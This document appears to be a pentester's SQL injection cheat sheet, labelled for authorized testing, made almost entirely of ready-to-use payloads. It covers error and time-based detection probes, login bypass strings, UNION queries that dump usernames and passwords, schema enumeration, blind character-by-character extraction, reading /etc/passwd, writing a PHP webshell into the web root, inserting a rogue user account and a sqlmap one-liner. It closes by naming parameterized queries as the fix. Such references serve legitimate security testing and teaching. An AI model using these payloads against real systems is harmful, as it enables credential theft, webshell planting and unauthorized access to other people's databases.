SQL Injection Cheat Sheet
Manual SQL injection payloads and techniques for detection, UNION extraction, blind, and authentication bypass on authorized targets.
Overview
SQL injection happens when user input is concatenated into a SQL query unsanitized, letting you alter the query's logic. The workflow: detect (break the query), determine the type (error/UNION/boolean/time-based blind), fingerprint the DBMS, then extract data. Automate with sqlmap once you understand the injection point manually—this sheet covers the manual payloads you need to find and confirm it.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Detect the injection
Single quote — triggers a SQL error if injectable
'Classic always-true test
1' OR '1'='1Numeric context: different responses confirm injection
1 AND 1=1 -- vs -- 1 AND 1=2Time-based probe (MSSQL) — page hangs 5s if injectable
'; WAITFOR DELAY '0:0:5'--Authentication bypass
Comment out the password check
admin'-- -Always-true, return first user
' OR 1=1-- -When only one row is expected
' OR 1=1 LIMIT 1-- -Comment variant for MySQL
admin'/*UNION-based extraction
Find column count (increment until error)
' ORDER BY 5-- -Match column count with NULLs
' UNION SELECT NULL,NULL,NULL-- -Find which columns are reflected on the page
' UNION SELECT 1,2,3-- -Dump credentials into the reflected columns
' UNION SELECT username,password,3 FROM users-- -Fingerprint & enumerate (MySQL)
Version, current DB, current user
' UNION SELECT @@version,database(),user()-- -List tables
' UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema=database()-- -List columns of a table
' UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'-- -Concatenate all rows into one field
' UNION SELECT group_concat(user,0x3a,password),2 FROM users-- -Blind SQLi (boolean & time)
Boolean: page differs when condition is true
' AND SUBSTRING(version(),1,1)='8'-- -Boolean data extraction, char by char
' AND (SELECT 1 FROM users WHERE username='admin' AND LENGTH(password)>10)-- -MySQL time-based confirmation
' AND IF(1=1,SLEEP(5),0)-- -MSSQL time-based
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -Quick one-liners
Let sqlmap take over once you've found the param
sqlmap -u 'https://target/item?id=1' --batch --dbsRead a file (MySQL, FILE privilege)
' UNION SELECT LOAD_FILE('/etc/passwd'),2-- -Write a webshell (MySQL, secure_file_priv off)
' UNION SELECT "<?php system($_GET[0]);?>",2 INTO OUTFILE '/var/www/html/sh.php'-- -Stacked query to run a second statement (MSSQL/Postgres)
'; INSERT INTO users(user,pass) VALUES('h','h')-- -Tips
- Comment styles differ: MySQL uses -- - (note the space) or #, MSSQL/Oracle use --, inline /* */ works widely.
- If errors are shown, error-based extraction (extractvalue/updatexml on MySQL) is faster than blind.
- URL-encode payloads when injecting via GET; watch for WAFs normalizing your input.
- The fix is always parameterized queries / prepared statements — note this in your report.